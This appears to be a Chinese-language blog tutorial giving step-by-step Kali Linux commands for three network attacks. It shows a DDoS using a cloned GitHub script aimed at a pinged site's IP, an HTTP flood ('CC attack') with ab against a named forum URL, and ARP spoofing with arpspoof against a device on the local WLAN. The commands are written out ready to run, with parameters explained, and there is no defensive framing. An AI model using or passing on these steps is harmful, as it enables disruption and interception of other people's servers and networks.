一、DDos 攻擊
首先,打開一個命令行
輸入以下命令:
git clone https://github.com/Andysun06/ddos
提示如圖所示
這樣,用于 DDos 的數據包就已經下載到了你的 Kali上
下面,進入你所下載的 DDos 文件夾,輸入命令(注意大小寫):
cd ddos
本文用于演示的 kali 是 2020 年版本,用 python 執行ddos-p2.py,輸入命令:
python ddos-p2.py
界面會如下圖所示:
然后輸入攻擊對象的 IP
再打開一個命令行窗口:
輸入命令:
ping andysun06.gitee.io
即可獲得攻擊對象的 IP 地址。(獲取 IP 后 Ctrl+C 可以結束 ping)
然后回到剛剛的命令行窗口,輸入 ping 到的 IP 地址
Attack Port 即攻擊端口,一般服務器默認為 80
Attack Speed 即攻擊速度,數值越大越快,最大不能超過 1000
按下回車,如果出現以下界面,即代表已經開始向該 IP 發起 DDos 攻擊,也就成功了。
二、CC 攻擊
首先打開一個命令行窗口
先獲得 root 權限,輸入以下命令:
sudo su
然后輸入你的賬號密碼(注意:輸入后不會顯示出來,不用擔心是否輸入進去,在輸完后按回車,如果輸入成功就會獲得 root 權限)
然后輸入以下命令:
ab -n 參數1 -c 參數2 網站地址
參數一是并發數(請求的用戶量)
參數二是發送總量(請求的總次數)
參數 1,參數 2 和網站地址由自己設置,這里以 1000,1000,http://bjvcrrn.nat.ipyingshe.com/bbs/ 為例:
出現如上界面即代表已經對目標網址開始了 CC 攻擊,如果出現如下界面,即代表 CC 攻擊完成:
三、ARP
首先,ARP 欺騙需要用到 dsniff 數據包(arpspoof 是 dsniff 的一個附屬工具,所以我們需要安裝的是 dsniff),安裝命令如下:
apt-get install dsniff
當然,有可能會遇到部分數據包安裝錯誤的情況,如果你遇到了這種情況,可以參考這個博文:Kali Linux 2020 中使用 arpspoof
如果你已經安裝了 dsniff 數據包,就可以開始 ARP 欺騙了,首先,通過以下命令確定你的網卡名稱和 IP 地址:
ifconfig
然后嗅探你所在 WLAN 下所有設備的 IP 地址,命令如下:
fping -g 本機IP地址/24
例如我的 IP 是 192.168.0.101,命令就是fping -g 192.168.0.101/24
我的手機,IP 位 192.168.0.100 就出現在了這里,我們就拿我的手機作為攻擊目標.
先獲得 root 權限,輸入以下命令:
sudo su
然后輸入你的賬號密碼(注意:輸入后不會回顯出來,不用擔心是否輸入進去,在輸完后按回車,如果輸入成功就會獲得 root 權限)
然后輸入以下命令:
arpspoof -i 你的網卡名稱 -t 攻擊目標的IP地址 攻擊目標的網關地址
網卡名稱的查看上文已經提過,我以我的網卡為例,名稱是eth0,攻擊目標就是我的手機,IP 是192.168.0.100,手機的網關就是 192.168.0.1(就是 IP 的最后一位改為 1),于是我的攻擊命令就是:
arpspoof -i eth0 -t 192.168.0.100 192.168.0.1
按下回車,如果出現下圖回顯,就說明正在攻擊
現在,我的手機雖然可以上網,但是速度慢的出奇,幾分鐘都打不開一個網頁圖片,這就說明我們的 ARP 欺騙成功了。
如果你想停止攻擊,就按下Ctrl+Z,攻擊就停止了。